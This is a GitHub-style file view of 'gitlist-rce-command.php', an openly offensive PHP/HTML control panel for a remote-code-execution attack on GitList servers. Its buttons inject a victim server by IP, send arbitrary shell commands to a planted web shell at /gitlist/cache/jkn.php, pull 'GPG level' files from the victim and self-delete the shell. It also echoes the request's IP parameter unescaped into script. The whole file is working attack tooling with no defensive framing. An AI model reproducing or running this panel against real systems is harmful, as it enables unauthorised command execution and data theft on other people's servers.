-
Notifications
You must be signed in to change notification settings - Fork 0
/
gitlist-rce-command.php
48 lines (43 loc) · 1.57 KB
/
gitlist-rce-command.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<SCRIPT language="JavaScript" type="text/javascript">
var ip='<?php echo $_REQUEST['ip'];?>';
function injectVictim() {
var url='gitlist-rce-inyect.php?ip=' + ip;
document.getElementById('commandiframe').src=url;
return true;
}
function exploitGitListRCECommand() {
var command=document.getElementById('gitlistRCECommand').value;
var url='http://' + ip + '/gitlist/cache/jkn.php?cmd=' + command;
document.getElementById('commandiframe').src=url;
return true;
}
function checkKey(e) {
if (e.keyCode == 13) {
exploitGitListRCECommand();
return false;
}
return true;
}
function downloadLevel(level) {
var url='http://' + ip + '/gitlist/cache/jkn.php?level=' + level;
document.getElementById('commandiframe').src=url;
return true;
}
</SCRIPT>
</HEAD>
<BODY>
<button OnClick="injectVictim()">Inject victim server</button>
<HR />
<button OnClick="downloadLevel(1)">Download GPG level 1</button>
<button OnClick="downloadLevel(2)">Download GPG level 2</button>
<button OnClick="downloadLevel(3)">Download GPG level 3</button>
<HR />
<button OnClick="downloadLevel(0)">Self delete</button>
<HR />
<INPUT type="text" id="gitlistRCECommand" OnKeyPress="checkKey(event)" value="ls -la"><button OnClick="exploitGitListRCECommand()">Send</button><BR />
<IFRAME id="commandiframe" src="about:blank" width="100%" height="400"></IFRAME>
</BODY>
</HTML>